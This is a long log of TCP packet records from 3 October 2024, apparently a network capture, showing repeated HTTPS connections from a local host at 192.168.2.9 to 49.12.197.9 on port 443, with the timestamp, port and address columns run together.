                                                                                                                                                                            Oct 3, 2024 03:27:06.764060020 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.764255047 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.778531075 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.778553009 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.778709888 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.778721094 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.778764963 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795281887 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795304060 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795449018 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795449018 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795460939 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.795500040 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.808804035 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.808825970 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.809043884 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.809052944 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.809099913 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.823968887 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.823990107 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.824080944 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.824088097 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.824238062 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836486101 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836505890 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836560011 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836566925 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836596012 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.836615086 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845633984 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845658064 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845704079 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845710993 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845737934 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.845760107 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.855318069 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.855340004 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.855439901 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.855448008 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.855490923 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.864517927 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.864541054 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.864605904 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.864614964 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.864654064 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.871946096 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.871968031 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.872010946 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.872018099 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.872042894 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.872060061 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.882880926 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.882901907 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.882956982 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.882963896 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.883107901 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.883107901 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896461964 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896483898 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896533012 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896539927 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896567106 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.896586895 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909652948 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909733057 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909753084 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909761906 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909790993 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.909802914 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.922949076 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.923017025 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.923058987 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.923064947 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.923119068 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931798935 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931879044 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931895971 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931905031 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931936026 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.931956053 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.941870928 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.941958904 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.941975117 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.941994905 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.942047119 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.942061901 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951118946 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951196909 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951226950 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951236010 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951262951 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.951281071 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958539963 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958616972 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958659887 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958669901 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958694935 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.958717108 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968039036 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968115091 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968158960 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968169928 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968318939 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.968318939 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970583916 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970671892 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970680952 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970721006 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970752954 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.970809937 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.971072912 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.971088886 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:07.325894117 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:07.326003075 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:07.326127052 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:07.326441050 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:07.326481104 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.017343044 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.017523050 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.018134117 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.018162966 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.019861937 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.019876003 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452558041 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452629089 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452646971 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452676058 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452696085 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452703953 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452755928 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452760935 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452784061 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.452811003 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.481674910 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.481723070 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.481781960 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.481789112 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.481837988 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550363064 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550429106 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550509930 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550533056 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550544977 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.550584078 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.580187082 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.580233097 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.580285072 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.580291033 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.580342054 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.617850065 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.617894888 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.617996931 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.618001938 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.618036985 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.618062019 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.648459911 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.648502111 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.648750067 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.648755074 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.648822069 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.667582989 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.667629004 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.667707920 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.667715073 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.667759895 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685584068 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685632944 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685676098 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685681105 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685712099 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.685735941 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.703339100 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.703406096 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.703448057 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.703453064 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.703519106 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718178988 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718225956 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718262911 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718267918 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718305111 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.718324900 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735326052 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735368967 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735409975 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735421896 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735455990 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.735481024 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749223948 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749274015 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749311924 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749319077 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749355078 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.749382973 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.763897896 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.763942957 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.764090061 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.764103889 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.764163017 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.776204109 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.776247978 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.776288986 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.776294947 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.776340008 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787158012 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787201881 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787240982 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787245989 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787276983 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.787307024 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796020031 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796077013 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796096087 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796101093 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796138048 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796143055 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796185017 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796228886 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796284914 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796443939 CEST49725443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:08.796457052 CEST4434972549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.081161022 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.081269026 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.081377029 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.081733942 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.081770897 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.758644104 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.758775949 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.759402990 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.759413004 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.761018991 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:09.761024952 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191318989 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191358089 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191380978 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191422939 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191422939 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191519022 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191561937 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.191586018 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222243071 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222266912 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222327948 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222378016 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222409010 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.222431898 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289232969 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289280891 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289386988 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289393902 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289413929 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.289436102 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.320283890 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.320316076 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.320420980 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.320429087 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.320471048 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.358886003 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.358954906 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.358978033 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.359019041 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.359072924 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.359402895 CEST49726443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.359416962 CEST4434972649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.633816004 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.633857965 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.634099960 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.634356976 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:10.634371996 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.287077904 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.287167072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.287708044 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.287731886 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.289654016 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.289670944 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717528105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717566013 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717586994 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717725039 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717736959 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717750072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.717943907 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.748282909 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.748317957 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.748544931 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.748557091 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.748661041 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.815375090 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.815408945 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.815520048 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.815520048 CEST49727443192.168.2.949.12.197.9
